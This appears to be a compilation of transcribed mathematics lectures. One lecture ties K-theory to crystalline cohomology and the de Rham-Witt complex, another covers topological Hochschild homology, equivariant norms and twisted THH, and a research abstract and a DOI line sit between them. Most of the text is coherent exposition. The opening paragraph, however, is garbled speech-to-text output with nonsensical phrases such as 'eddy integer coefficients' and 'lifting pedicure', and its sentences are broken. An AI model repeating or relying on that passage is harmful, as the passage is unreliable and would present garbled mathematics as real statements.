should use infinity model of P. And you can use it as a model of your expectation because you take a curve and remove lots of points, each points creates your technology class. So H one crystalline or fine line is huge. And so some people think it's a bug and try to correct for this and there are ways to correct for this using original logic spaces and maybe putting lock structure. Lots of interesting stories about how to correct this make is telling homology behave more like you would expect the most theory to behave. But on the other hand, you can think about it as not a bug of the future, something which is intrinsic to the nature of this thing come all just work. And this is the viewpoint I want to adopt. And I'm sorry to have interrupted you really cartoonist asks when a lifting exists, I'm telling how I'm all you with the eddy integer coefficients, if to the drum with same coefficients or you need to pass to be eddy No, no, no, no, no, no, it's through integrally. So a lifting has to be smooth. In larger breaks and. But then it's true it's true. It's true. And then you can't have any of the key officials. Of course, you can and after that in words, and the world people you don't have. But what you have to do you have to complete your lifting pedicure. So it really has to be some kind of some kind of formal scheme because the story is really about infinitesimal series of infinitesimal lifting that are. So it's true integrally but has to be a little complete. This for a one what you get will be actually torsion. 
Okay. So my general goal in these lectures is the following. I want to leave the etale story completely aside; it is not what I want to present. I want to think about K-theory and crystalline cohomology, and I want to show that the two phenomena are actually related, the two phenomena being that neither K-theory nor crystalline cohomology behaves in the way you would expect. And actually, if you start thinking about K-theory, it inevitably leads to crystalline cohomology: if you do not know about crystalline cohomology at all, but you think about K-theory long enough, you discover crystalline cohomology automatically. That is the message I want to explain. As an additional bonus, it will turn out that this whole story is naturally defined in much bigger generality: you do not have to start with a commutative ring or an algebraic variety, you can do it for any associative unital, not necessarily commutative, ring, or even a dg algebra. So the whole story turns out to be non-commutative, which is another bonus, more than was originally expected; but let us not get ahead of ourselves, this will come up. Okay, let me start the story. I told you what the story should be, and now let me actually start doing it. I need to tell you at least something about crystalline cohomology. I told you one thing: when you have a lifting, crystalline cohomology computes the de Rham cohomology of the lifting. The other thing I want you to know is the following. Assume now that X is smooth over k, with k perfect. Then there is a complex of sheaves on X, a certain replacement of the de Rham complex, which computes the crystalline cohomology of X, with its canonical extra structure, in the same way that the de Rham complex computes de Rham cohomology. This W Omega^*_X behaves like the de Rham complex: it is canonical, functorial with respect to local morphisms, compatible with gluing, and so on. It is called the de Rham-Witt complex. I think the original idea is due to Bloch, and the theory was later developed and fully worked out by Illusie, with lots of input from Deligne; if you read Illusie's papers, he says very often that this and that was done by Deligne. The story is from the mid-to-late 70s. I do not really need to tell you what the whole complex is, but its first term, what replaces functions, is something which had been around for quite some time already: we have W Omega^0_X, where Omega^0_X is just functions, and the first term is the ring of Witt vectors W(O_X). This already appeared, of course, but I did it for a field, and if you did not know what it was you could just treat it as a black box. For a general ring it is certainly not anything like a field; it is built out of polynomials in many variables with some relations. So I need to explain what W really is. A recollection, then, a sub-recollection of the recollection we are in: what is this W? At the very least it is a functor from commutative rings to commutative rings, but at this point the fact that it is a ring will not be that important; let me first describe it as a functor from commutative rings to abelian groups. There are many ways to present the story. The first one is the following: you first define something bigger.
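Before recalling the Witt vectors, here is the comparison that the de Rham-Witt complex is designed to satisfy, written schematically; this is the standard Bloch-Deligne-Illusie statement, and the precise formulation here is my gloss on what is said above:
\[ H^*_{\mathrm{cris}}\big(X/W(k)\big)\;\cong\;H^*\big(X,\;W\Omega^{\bullet}_{X}\big), \qquad W\Omega^{0}_{X}=W(\mathcal{O}_X). \]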
So, as an abelian group: you start with some A, a commutative ring, and that is the only requirement, and you define an abelian group called the big Witt vectors, denoted by a blackboard-bold W(A). The definition is basically the most naive thing you can do. You have something which is possibly of characteristic p, and the goal is to produce something which is not of characteristic p. If you have a commutative ring, you have its additive group, which of course has the same characteristic as A; but you also have the multiplicative group. The multiplicative group of A itself may be very complicated, but you can add one formal variable: consider formal power series in one variable t with coefficients in A, and consider the invertible ones. A power series is invertible exactly when its leading term is invertible, so there is a map which sends a series to its leading term, and this map is split, because you can send any invertible element of A to the constant power series. So A[[t]]^x splits as A^x times something else, and this something else, which you will see written in the literature as 1 + tA[[t]], consists of the formal power series with leading term 1. The group operation is multiplication. Now there is a way to look at this which at first looks a little too complicated: instead of the multiplicative group you can consider algebraic K-theory, not higher K-theory, just K_1. The definition of K_1 we actually saw in the talk yesterday; fortunately it is very close to A^x: K_1(A) is A^x plus something else. That something else can be non-trivial, but it is the same for A and for power series over A, so when you take the relative term it does not change. The formal definition: you take the infinite general linear group and take its first homology, its abelianization; taking determinants gives a map K_1(A) to A^x, which is not always an isomorphism, but it is not far from one, and it certainly induces an isomorphism on the relative term for power series. In fact, K_1(A[[t]]) also canonically splits as K_1(A) plus the relative part. Now why is this useful? I gave you the definition of K_1 in terms of GL_n; there is also a more invariant way to define it, and the point of the invariant definition is that K_1 is not really an invariant of the ring but an invariant of the category of finitely generated projective modules. Let me denote by P(A) the category of finitely generated projective A-modules; K_1 is then functorial with respect to suitable functors between such categories. And there is one obvious functor. Let me now stick, for simplicity, with the situation where A is an algebra over some field k. If you have a finite-dimensional k-vector space V together with an endomorphism a, you can consider the functor from projective modules to itself which tensors a module with V and twists by this endomorphism a. Such a functor induces a map on K_1, so for every pair (V, a) we get an endomorphism of this group.
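To fix notation for what follows, here are the big Witt vectors and their K-theoretic description, as just explained; the identification of the relative term is taken on the lecturer's word and stated only schematically:
\[ \mathbb{W}(A)\;:=\;\big(1+tA[[t]]\big)^{\times}, \qquad \mathbb{W}(A)\;\cong\;\ker\big(K_1(A[[t]])\longrightarrow K_1(A)\big). \]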
Example: take some integer n. Consider the cyclic group Z/n, take the corresponding group algebra, an n-dimensional vector space, and let a act by the generator; so it is just the regular representation of the cyclic group, with the generator acting by the cyclic shift. This is a vector space with an endomorphism, so by the construction above it gives us an endomorphism, which I will denote epsilon_n. To compose epsilon_n with itself we have to take the product of (V, a) with itself, and you see that as a vector space with endomorphism this is just a sum of n copies of the original. This means that epsilon_n is almost an idempotent: it squares to n times itself. So it can be used as follows. Suppose now that we are over a field k, or something similar, of characteristic p, so that everything not divisible by p is invertible. Then, if n is not divisible by p, you can divide epsilon_n, as an endomorphism of the big Witt vectors, by n, and this defines an idempotent: it squares to itself. You can show that the whole of the big Witt vectors splits accordingly: you have a family of commuting idempotent endomorphisms indexed by all positive integers not divisible by p, and the big W(A) splits as a product of copies of a single thing, which is denoted by W(A) without the blackboard bold. This is, if you want, the common kernel of all those idempotents, and it is known as the group of p-typical Witt vectors. This is my W(A), the p-typical Witt vectors. There is an additional theorem that it carries a product, so it is actually a ring, and this is the ring of Witt vectors; but for me it is not important right now that it is a ring. What is interesting is that it turns out that exactly the same construction now gives you the whole de Rham-Witt complex. There is one correction: I was working with K_1, but we have the whole of algebraic K-theory, all the K_n. And then, of course, formal power series: A[[t]] is by definition the projective limit of the truncated rings A[t]/t^(m+1), and K-theory does not commute with this limit; it does commute for K_1, but not for higher K-theory. So what I want to do is consider a completed K-theory of A[[t]], defined as this inverse limit, and of course it has to be a homotopy limit. Again there is the augmentation map to the leading term, which is split, so this completed K-theory splits as the K-theory of A plus a relative part. And again, all of K-theory depends only on the category of modules, so you have the same operators epsilon_n on this relative part, and as before you can look at the idempotents and take their common kernel. The theorem is that this gives you exactly the terms of the de Rham-Witt complex. So let A be smooth, commutative, maybe finitely generated, so just a smooth affine algebraic variety. Then the degree-i term W Omega^i_A is naturally identified with the common kernel of all those idempotents acting on the completed relative K-group in degree i+1. So the point, the gist of this, is that if you just replace K_1 with higher K-theory, you automatically, without thinking, arrive at the de Rham-Witt complex and at crystalline cohomology.
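Written out, the splitting and the identification just stated look roughly as follows; the indexing and completion conventions here are my reading of the statement, not a precise citation:
\[ \mathbb{W}(A)\;\cong\;\prod_{(n,p)=1} W(A), \qquad W\Omega^{i}_{A}\;\cong\;\bigcap_{n>1,\ (n,p)=1}\ker\Big(e_n:\ \widetilde{K}_{i+1}\big(A[[t]]\big)\to \widetilde{K}_{i+1}\big(A[[t]]\big)\Big), \]
\[ \text{where } \widetilde{K}_{*}\big(A[[t]]\big)\;:=\;\ker\Big(\lim_m K_{*}\big(A[t]/t^{m}\big)\longrightarrow K_{*}(A)\Big) \ \text{and } e_n=\epsilon_n/n. \]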
Now, this theorem has a long history. It was originally conceived by Bloch: the paper where he introduced the ideas behind the de Rham-Witt complex was concerned precisely with p-typical curves in algebraic K-theory. But that was before, or at least right around the time, Quillen's K-theory appeared, so he worked with the earlier version, Milnor K-theory, and he could only do it in small degrees or so. Sorry, a quick question: is it obvious that there is a chain complex structure on these relative K-hats? It is an Eilenberg-MacLane spectrum, so it is a chain complex; but no, it is not obvious. So that is one question, and another question is: I get the individual terms W Omega^i, but where is the differential? That is the next question, which I am going to address on Thursday; the one-line answer is that it comes from the circle action on this relative K-theory. But that will have to wait; there is no time for it today, and I will explain it on Thursday. The result itself is due to Lars Hesselholt; there is a paper of his whose title is very similar to Bloch's, called 'On the p-typical curves in Quillen's K-theory'. But even there it uses lots of technology, so I am not really sure what the best reference is; it is also not easy to prove directly, and I am not going to prove it in these lectures. What I am going to present in these lectures is a way to see that this thing here is actually very computable: it is related to an invariant which you can compute, and identifying that with the de Rham-Witt complex is a separate story which is not that interesting. The main thrust will be this, and the first thing I will explain on Thursday is how to get the differential, so that you really obtain the de Rham-Witt complex and not just its terms. Okay, I have to run now, more or less. Okay, let's thank the speaker for today's lecture, and please prepare your questions and comments for the Thursday and Monday lectures. Thank you very much. Bye bye.
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of étale type, and theories of crystalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from algebraic K-theory, and there is a bunch of “motivic” conjectures claiming that in various contexts, this map can be refined to some “regulator map” that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern point of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of Bökstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in a bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition to this, the non-commutative setting allows for completely new methods. One such is the observation that Hochschild homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this has already allowed one to prove several general comparison results.
|
10.5446/50943 (DOI)
|
Thank you. Since this is my last lecture, I also want to take the opportunity to thank the organizers for putting this together, and also for making the effort to move this online. I of course wish we could have all been together in France, but it's nice that we were able to do it this way. And thank you all for coming to hear the third installment about algebraic K-theory and trace methods. What I want to do today is talk a little bit more about topological Hochschild homology. We talked a lot about topological cyclic homology on Tuesday, but now I want to dig a little deeper into THH itself. To get started, I want to recall some things that were said earlier in the week but that will be very important for us today, just to make sure we're all on the same page with these basic constructions. So let's remember all the way back to Monday. On Monday we talked about how, if you have a ring A and you want to study its algebraic K-theory, there is a map relating the algebraic K-theory of the ring and the Hochschild homology of the ring. That map is called the Dennis trace, and it was the starting point for the whole trace-methods approach to algebraic K-theory. So Hochschild homology is going to be very important for us today. I know I've already defined it, but I want to recall the definition so it's fresh in our memory as we talk a little more deeply about it. What is Hochschild homology? Remember that we defined a simplicial abelian group called the cyclic bar construction. We said on Monday that in the q-th level this is just q+1 copies of the ring A tensored together, and it has face and degeneracy maps. I want to recall those face maps because they will come up again for us today. What do the face maps do? For the most part, the i-th face map just takes the i-th and (i+1)-st factors of a tensor and multiplies them together, sending a_0 tensor ... tensor a_q to a_0 tensor ... tensor a_i a_{i+1} tensor ... tensor a_q, and that makes sense as long as i is less than q. But remember that the last face map does something different: it brings the last element around to the front and then multiplies, so it sends this to a_q a_0 tensor a_1 tensor ... tensor a_{q-1}. Those were the face maps we had on Monday. And the degeneracies insert the unit after the i-th coordinate. Then we noted that we also have an additional operator, called the cyclic operator, which is not part of the simplicial structure but is important for us: it just takes the tensor and brings the last factor around to the front. Okay, so we defined this cyclic bar construction on Monday, and then I said: what is Hochschild homology? Hochschild homology is just the homology of this cyclic bar construction. What is the boundary map in that chain complex? It is the alternating sum of the face maps, and you can check that it squares to zero. We take homology, and that's called Hochschild homology. We also said that, by the Dold-Kan correspondence, we could alternatively define this as the homotopy groups of the geometric realization of this simplicial object. And that was Hochschild homology as we had it on Monday.
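Since these formulas get used again below, here they are in symbols (this is just the standard cyclic bar complex as recalled above):
\[ B^{cy}_q(A)=A^{\otimes(q+1)},\qquad d_i(a_0\otimes\cdots\otimes a_q)= \begin{cases} a_0\otimes\cdots\otimes a_i a_{i+1}\otimes\cdots\otimes a_q, & 0\le i<q,\\ a_q a_0\otimes a_1\otimes\cdots\otimes a_{q-1}, & i=q, \end{cases} \]
\[ \mathrm{HH}_*(A)=H_*\Big(B^{cy}_\bullet(A),\ \textstyle\sum_i(-1)^i d_i\Big)\;\cong\;\pi_*\big|B^{cy}_\bullet(A)\big|. \]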
And then we noted something important about this cyclic bar construction on Monday, which is that it's really not just a simplicial object, it's what we call a cyclic object. The cyclic bar construction is a cyclic object, which means, by the theory of cyclic sets, that its geometric realization has an S^1-action. Okay, we talked about that on Monday. And then what did we say about this? What we learned on Monday is that this is an approximation to algebraic K-theory, but we can do better by thinking about a topological analog of this theory. So on Monday we talked about how there is a topological analog, called topological Hochschild homology, and topological Hochschild homology is related to K-theory via a trace map as well, which in fact factors the Dennis trace. The first map, from K-theory to THH, is often referred to as the topological Dennis trace, or sometimes just the Dennis trace, and the second map is linearization. And what was the rough idea of how to define topological Hochschild homology? We said on Monday that the idea is supposed to be the following: in the definition of the cyclic bar construction I had rings, and now I replace those with ring spectra, the topological version of rings; my tensor products become smash products; instead of working over the integers I'm really working over the sphere spectrum. If you make those replacements, you'd probably make the following definition of THH: for R a ring spectrum, the topological Hochschild homology of R is the geometric realization of the cyclic bar construction on R. And then we said that when we talk about the topological Hochschild homology of a ring A, THH(A) is just notation for the topological Hochschild homology of the Eilenberg-MacLane spectrum of that ring, the ring spectrum associated to it. One more thing that we noted on Monday, and talked about at length on Tuesday, is that topological Hochschild homology is an S^1-spectrum, and we saw that this was essential to our applications, essential to defining topological cyclic homology from it. Okay, so those are the things I'm recalling from Monday. One thing to note about the history is that it was Bökstedt who first constructed topological Hochschild homology, and he did this many years ago, without some of the nice luxuries that we have today. In particular, when Bökstedt made this construction he didn't have nice point-set categories of spectra with a well-behaved smash product. What I've written here is the idea: today we can execute it quite literally and define topological Hochschild homology as this cyclic bar construction, but at the time Bökstedt originally constructed THH you couldn't do that so literally, because those tools just didn't exist yet. If you look back at Bökstedt's construction, what we now call the Bökstedt model of THH, you see that he developed a lot of machinery to work around that; he developed what we now refer to as the Bökstedt smash product. The interesting thing is that for years, up until very recently, we continued to use Bökstedt's model for K-theory applications, even though with current technology it makes perfect sense to give this cyclic bar construction definition. Why is that? The reason is that it was known that Bökstedt's THH was cyclotomic.
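Schematically, the constructions recalled so far look like this (smash products are taken over the sphere spectrum, and HA denotes the Eilenberg-MacLane ring spectrum of A):
\[ K(A)\longrightarrow \mathrm{THH}(A)\longrightarrow \mathrm{HH}(A), \qquad \mathrm{THH}(R):=\big|B^{cy}_\bullet(R)\big|,\quad B^{cy}_q(R)=R^{\wedge(q+1)},\quad \mathrm{THH}(A):=\mathrm{THH}(HA). \]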
And it wasn't known how to put a cyclotomic structure on this definition. So: can you put a cyclotomic structure on the cyclic bar construction? In recent years the story has changed because of major advances in equivariant homotopy theory, and that's the starting point for the new material I want to talk about today: the cyclic bar construction model for THH and how we can now understand a cyclotomic structure on it. This comes out of major advances in equivariant stable homotopy theory coming from the work of Hill, Hopkins, and Ravenel on the Kervaire invariant one problem. In particular, in the context of their work on Kervaire invariant one, they studied extensively what are called norms in equivariant homotopy theory. So I want to say a little bit about these norms. The norms as I'll discuss them today come out of the work of Hill, Hopkins, and Ravenel, building on earlier work on equivariant norms due to Greenlees and May. Okay, so let me say a little about these norms in equivariant stable homotopy theory. What's the idea? Let's say we have G a finite group and H a subgroup of G. The norm functors that Hill-Hopkins-Ravenel study have the following form: the norm from H to G is a functor from H-spectra to G-spectra. It takes as input an H-spectrum and gives out a G-equivariant spectrum. These are symmetric monoidal functors, which is a very nice thing about them. And in the commutative case they have a nice characterization: you can show that if you input a commutative ring H-spectrum, a commutative object in H-spectra, the norm from H to G gives you a commutative G-ring spectrum, and further, in the commutative case this norm functor is left adjoint to the restriction functor, which I'll call iota_H^*. I've used the word restriction a lot of different ways in this lecture series; the functor I mean here is just the one that takes a G-spectrum and forgets down to an H-spectrum, so we only remember the H-action. Okay, so these are the norms in equivariant stable homotopy theory, and it turns out that by studying them deeply, Hill, Hopkins, and Ravenel were able to get a handle on the Kervaire invariant one problem. But that's a very different question from the kinds of questions we've been looking at. So how does this connect to topological Hochschild homology, or to the trace-methods story? The first question I want to address is why you would even think there would be a connection, and the hint comes out of a theorem of Hill, Hopkins, and Ravenel. They prove that if R is cofibrant and G is finite, there is an equivalence: they constructed a map from R to what you get when you take the norm from the trivial group to G of R and then take the G-geometric fixed points of that, and this map is an equivalence. I see a couple of questions in the chat. The first question is about whether these norms exist for general G or only for finite G.
So, Hill, Hopkins, and Ravenel constructed these norms for finite G, but in a minute we are going to talk about extending them to a non-finite group. So in some general sense, yes, they only exist for finite G, and if you want to talk about these norms for a particular group that's not finite, you need to somehow construct what that means, which we are going to do in just a moment. And what do I mean when I say commutative? I mean actual commutative monoids in these categories of equivariant spectra; this is a genuine notion of commutativity in genuine equivariant homotopy theory. Okay, so what was I saying? Right, Hill, Hopkins, and Ravenel constructed this kind of diagonal map and proved that it gives an equivalence. And if you look at that, it looks a bit familiar: it looks like it could be related to the classical definition of cyclotomic spectra that we had on Tuesday. If you remember, cyclotomic spectra were supposed to be things where you take the geometric fixed points and get back the original spectrum you started with. Now that's not exactly what's happening here, since we additionally have a norm functor in there, but it looks like there could be some kind of relationship; this is giving me some kind of diagonal map involving geometric fixed points, and it feels reminiscent of cyclotomic structures. Okay, so, I think that question was anonymous, but somebody just pointed out that I've said these norm functors exist for finite groups, and you could ask whether we can do this for a group that's not finite. In work of Vigleik Angeltveit, Andrew Blumberg, myself, Mike Hill, Tyler Lawson, and Mike Mandell, sorry, that's a lot of people, and let me also mention related work from around the same time due to Martin Stolz, we extended the norm to consider norms to S^1. So we show that you can extend this: you can define a norm functor from the trivial group to S^1. This makes sense if what you start with is an associative ring spectrum, and it spits out an S^1-spectrum. So what is this norm functor that we construct? The claim is that the norm from the trivial group to S^1 should be viewed as the functor that takes a ring spectrum and sends it to the geometric realization of its cyclic bar construction. What is the content of saying that this is a norm functor? The claim is that it behaves like a norm: in particular, if you restrict to the commutative case, you see this thing as the left adjoint of the forgetful functor from S^1-equivariant commutative ring spectra down to commutative ring spectra. I see there's a question: do I mean strictly associative here? I really do mean associative ring spectra. Okay, so we show that you can define a norm in that way, or, another way of saying it, we should really think of topological Hochschild homology as an equivariant norm: it is the norm from the trivial group to S^1. And then the theorem of these same people, Angeltveit, Blumberg, Gerhardt, Hill, Lawson, Mandell, is that, for R cofibrant, this definition of topological Hochschild homology as the norm, which is the cyclic bar construction definition, actually does have a cyclotomic structure.
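In symbols, here are the norm formalism and the two statements just made, with the hypotheses as stated in the lecture (G finite and R cofibrant for the diagonal equivalence):
\[ N_H^G:\ \mathrm{Sp}^H\to\mathrm{Sp}^G,\qquad N_H^G\dashv \iota_H^*\ \text{on commutative rings},\qquad R\;\xrightarrow{\ \simeq\ }\;\Phi^G\big(N_e^G R\big), \]
\[ \mathrm{THH}(R)\;\simeq\;N_e^{S^1}R\;=\;\big|B^{cy}_\bullet(R)\big|. \]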
For many years this was a question, whether you can put a cyclotomic structure on the cyclic bar construction, and it turns out that using this work of Hill-Hopkins-Ravenel and these norm functors you can indeed do so. In other words, there is a cyclotomic structure on the cyclic bar construction. There is a question in the chat about whether we can define the S^1-norm on bare spectra with no ring structure. No: the S^1-norm, in order to be a sensible construction, does need to input an associative ring spectrum, so that is a bit different from what happens in the classical case, where the norm from H to G for finite groups inputs an H-spectrum, not necessarily an H-ring spectrum. Good question. Okay, and then let me mention a subsequent theorem of Dotto, Malkiewich, Patchkoria, Sagave, and Woo. What do they show? I've just said that the cyclic bar construction definition of THH has a cyclotomic structure; you'd want to know that it is the same as, or equivalent to, the cyclotomic structure on the Bökstedt model, that we're getting the same theory of topological Hochschild homology out of these. And that's what Dotto, Malkiewich, Patchkoria, Sagave, and Woo show: the cyclotomic structure we construct on the cyclic bar construction agrees with, or is equivalent to, the one on Bökstedt's model, the one that we've used historically for K-theory applications. It's further nice because we talked on Tuesday about how Nikolaus and Scholze also have a new framework for studying K-theory, and I didn't say much about their model of THH, but they construct THH in an infinity-categorical setting as a cyclic-bar-construction-type object, and Nikolaus and Scholze compare their cyclotomic structure to Bökstedt's as well. So the results of Dotto, Malkiewich, Patchkoria, Sagave, and Woo tell you that all three versions of THH have equivalent cyclotomic structures. So that's nice. Okay, so I'm claiming now that we should think of topological Hochschild homology as an equivariant norm, and why is that a nice way to think about it? One reason is that it lends itself to some nice generalizations, and I want to mention one of those now, coming out of this same work. We make the following generalization: suppose we want to study an equivariant ring spectrum, say a C_n-ring spectrum R. Then we can define a C_n-twisted version of topological Hochschild homology, which I'll write as the C_n-twisted THH of R. What should this be? Recall that I just said that ordinary topological Hochschild homology is supposed to be the norm from the trivial group to S^1. Now I'm feeding in something that already has a cyclic group action, so what should its topological Hochschild homology be? I claim it should be the norm from C_n to S^1 of R. The next natural question is: what does that even mean? I've told you how to define the norm from the trivial group to S^1, but what is the norm from the cyclic group C_n to S^1? In the commutative case you could define it as a left adjoint to a restriction functor, but if you want to take input that's not necessarily commutative, you need to give a more concrete construction. So how do we construct this norm?
You can do this using a cyclic bar construction, but not the classical cyclic bar construction; we have to use a variant, which I'll write as B^{cy, C_n}. This is a C_n-twisted version of the cyclic bar construction. At first it will seem similar to what we did before: in the q-th level this is q+1 copies of R smashed together (R is a spectrum), and it has the usual degeneracies, which insert a unit in the correct spot after the i-th coordinate. The face maps are a bit different. In order to define the face maps, I first need a piece of notation: let g denote the generator e^{2 pi i / n} of C_n, and let alpha_q be a map on the q-th level, from the (q+1)-fold smash power of R to itself. This operator alpha_q does two things: first, it cyclically permutes the last factor to the front; second, it acts on the new first factor by the element g. I should have mentioned above that the input R of this twisted cyclic bar construction is a C_n-ring spectrum. Let me make a little schematic: I have my q+1 copies of R, and alpha_q takes the last one, wraps it around to the front, so it is now the new first factor, and acts on it by the generator g, which makes sense because R is an equivariant spectrum. Okay, that was by way of telling you what the face maps are. So what are the face maps? A lot of them are the same old thing they were before: the i-th face map is just multiplication of the i-th and (i+1)-st factors, as long as i is less than q. The last one is something different now: the last face map is defined to be d_0 composed with alpha_q, that is, apply alpha_q, bringing the last factor around to the front and acting on it by g, and then multiply the first two factors together. Okay, that's my new last face map. The last note is that I claim this is still a simplicial object, meaning there are simplicial identities to check, and you can check that they are still satisfied. So this is simplicial. But while you're checking identities, you might check the cyclic identities: is it a cyclic object? And you learn quickly that this is simplicial but not cyclic. That sounds like bad news, because, if you remember, it was the fact that the cyclic bar construction was cyclic that gave us an S^1-action when we geometrically realized. Now I'm claiming that this thing is supposed to have an S^1-action, because I want it to be the norm to S^1. So why does it still have an S^1-action? You can check that it doesn't satisfy the cyclic identities, but it does have additional structure. Let's see what kinds of things are true: this operator alpha_q generates a C_{n(q+1)}-action in simplicial degree q.
That is because alpha_q is both rotating the q+1 factors and acting by a generator of C_n, so it generates an action of the cyclic group of order n(q+1) in simplicial degree q. Further, the face and degeneracy maps satisfy some relations. We already said that, by definition, alpha_q followed by d_0 is d_q; and alpha_q followed by d_i, for i between 1 and q, is the same as d_{i-1} followed by alpha_{q-1}. Similarly alpha satisfies some relations with respect to the degeneracies, which I won't write down. If you write down all of those relations, what you see is that this is an example of a familiar object: it defines what is called a Lambda_n^op object in the sense of Bökstedt, Hsiang, and Madsen. This structure came up in Bökstedt, Hsiang, and Madsen's work on topological cyclic homology in a different way: it came up because they were studying edgewise subdivision, and this kind of structure naturally arises in that context as well. If n equals 1, a Lambda_n^op object is just a cyclic object, so this is a generalization of what it means to be cyclic. The nice thing about the fact that Bökstedt, Hsiang, and Madsen have already studied this kind of object in depth is that we can borrow some of what we need from them: in particular, they prove that the geometric realization of this kind of object still has an S^1-action. Which is good news for us, because we were hoping to have such an S^1-action. So what is the definition of this twisted topological Hochschild homology? The definition is as follows: the C_n-twisted topological Hochschild homology of my C_n-ring spectrum R is supposed to be the norm from C_n to S^1 of R, and I claim that this norm can be constructed as the twisted cyclic bar construction on R. There is a question: can I say something about the universal property satisfied by the modified cyclic bar construction? That's a good question; not off the top of my head. I'm sorry, I should be able to answer that and it's just not in my brain right now. If you're interested in learning more about this kind of Lambda_n^op object, the place to look is the Bökstedt-Hsiang-Madsen paper where they originally defined the cyclotomic trace. I just can't get to the universal property characterization right now. Okay, so I claim that this twisted cyclic bar construction is a construction of the norm from C_n to S^1, and in particular we show that, when you restrict to the commutative case, this twisted cyclic bar construction is the left adjoint to the forgetful functor in the way that you would want; it has the properties that characterize a norm in the commutative case. I should also note, in the interest of honesty, that in this definition I'm omitting some change-of-universe functors needed to make the technical equivariant stable homotopy theory correct. If you are an expert in that area and are looking for those, they're there, I just didn't write them; and if you don't know about change-of-universe functors, for these purposes just ignore it.
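Putting the twisted construction in one display (g denotes the chosen generator of C_n, and the description of alpha_q is schematic rather than a precise point-set formula):
\[ B^{cy,C_n}_q(R)=R^{\wedge(q+1)},\qquad \alpha_q=(g\wedge\mathrm{id}^{\wedge q})\circ(\text{rotate the last factor to the front}),\qquad d_q:=d_0\circ\alpha_q, \]
\[ \mathrm{THH}_{C_n}(R)\;:=\;N_{C_n}^{S^1}R\;\simeq\;\big|B^{cy,C_n}_\bullet(R)\big|. \]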
Okay, so this is C_n-twisted topological Hochschild homology, and a question you might immediately ask about it is: THH was cyclotomic, and that was important to the story, so is this twisted THH still cyclotomic? We prove the following: for R cofibrant, and p prime to n, the C_n-twisted topological Hochschild homology of R is p-cyclotomic. I don't think I defined p-cyclotomic when we talked about cyclotomic spectra on Tuesday, but p-cyclotomic just means that you only check the cyclotomic conditions at the prime p, so it is specific to the prime p. Therefore we can define C_n-twisted versions of topological cyclic homology as well. So that's nice. The next question I might ask about this theory is: can you actually compute this twisted topological Hochschild homology of anything? Is C_n-twisted topological Hochschild homology computable? And what might you even want to try to compute? Maybe it's nice to have an example in mind of what kind of thing would be interesting to understand. For instance, we could ask: can we understand the C_2-twisted THH of the spectrum MU_R? What is MU_R? MU_R is the C_2-equivariant Real bordism spectrum. This was defined by Landweber and Fujii, but it has gotten a lot of attention in recent years because it played a really fundamental role in the solution to the Kervaire invariant one problem. So this is a particular C_2-equivariant spectrum in which there is a lot of interest. I see there's a question in the Q&A, which is: is there a description of the C_n-relative THH in terms of a factorization-homology-type construction? Yeah, that's a great question. For those who are familiar, ordinary topological Hochschild homology can be described in terms of the factorization homology of David Ayala and John Francis. The C_n-twisted THH has been described by Asaf Horev in terms of his theory of equivariant factorization homology. So yes, he gives a characterization of this relative THH in terms of an equivariant version of factorization homology. Okay, so that's the kind of example we might want to understand. Now, if you think about this, you'll realize that we talked a lot on Tuesday about how to compute topological cyclic homology, but I was always sort of assuming in that discussion that we understood THH to begin with: we described an inductive process to build off of THH to understand its fixed points, or, in the Nikolaus-Scholze model, we understood THH and then studied its homotopy fixed points or its Tate construction. I didn't talk at all about how to actually compute THH; I've said very little about that. So before I can talk about the question of whether this twisted THH is computable, we need to take a step back and talk about how you compute ordinary THH. Ordinary topological Hochschild homology is really the starting point for modern trace methods: if you can't compute THH of the object you're interested in, you're not going to be able to compute topological cyclic homology or algebraic K-theory. It all starts with THH. One of the main tools for computing ordinary topological Hochschild homology is called the Bökstedt spectral sequence. And what is the Bökstedt spectral sequence?
It arises in the following way. Topological Hochschild homology, remember, was the realization of a cyclic object, which I've been writing as the cyclic bar construction. When you have a simplicial object like that and you study its realization, you get a spectral sequence induced by the skeletal filtration. That's a standard tool: the skeletal filtration induces a spectral sequence that converges to the homology of the spectrum THH with coefficients in some field. Now, what is the E_2 term of that spectral sequence? What Bökstedt proved, which is really just so nice, is that on E_2 you get something familiar: you get ordinary Hochschild homology. The E_2 term here is the Hochschild homology of the homology of R. I think this is so beautiful: if you want to study this topological theory, topological Hochschild homology, you get a spectral sequence whose E_2 term lives in the algebraic analog, which is easier to compute. Hochschild homology has all the tools of homological algebra at your disposal, so it is something much more computable than the topological theory. So Bökstedt constructed this spectral sequence and did some beautiful calculations with it right off the bat: Bökstedt computed the topological Hochschild homology of F_p and also the topological Hochschild homology of the integers. Bökstedt did this work quite a few years ago now, but these calculations, particularly the topological Hochschild homology of F_p, are still foundational to so much work we do in K-theory today. Many of those calculational results that I mentioned on Monday take Bökstedt's work on THH as input. Okay, so the Bökstedt spectral sequence is very powerful and has been foundational to calculations, and so one question is: what does this mean in our setting? I'd want to have an equivariant version of this Bökstedt spectral sequence for twisted THH. That is probably the most direct way to get a handle on calculations here. Okay, so I think about that, and I think about what it means to want that: my Bökstedt spectral sequence should compute some homology of twisted THH, and the E_2 term should be the algebraic analog of twisted THH. And then we realize we have no idea what that is. What is the algebraic analog of twisted THH? It's not immediately obvious what it should be. In the classical theory we started from the algebra and made a topological construction analogous to it. Now we've generalized that, and it's not clear anymore what algebra it comes from. So maybe we should revisit what it meant to be the algebraic analog in the classical case, and that will hopefully provide us some inspiration. What did it mean in the classical case? In the classical case we were looking at rings, and we had a relationship between topological Hochschild homology and ordinary Hochschild homology: the linearization map, where THH(A) is notation for THH of the Eilenberg-MacLane spectrum. Now, I haven't mentioned this so far, but in the classical theory, not only do you have this linearization map relating these two, it is also the case that in degree zero it is an isomorphism. So this linearization map in degree zero is an isomorphism, and I'd like some analogous story with my twisted THH.
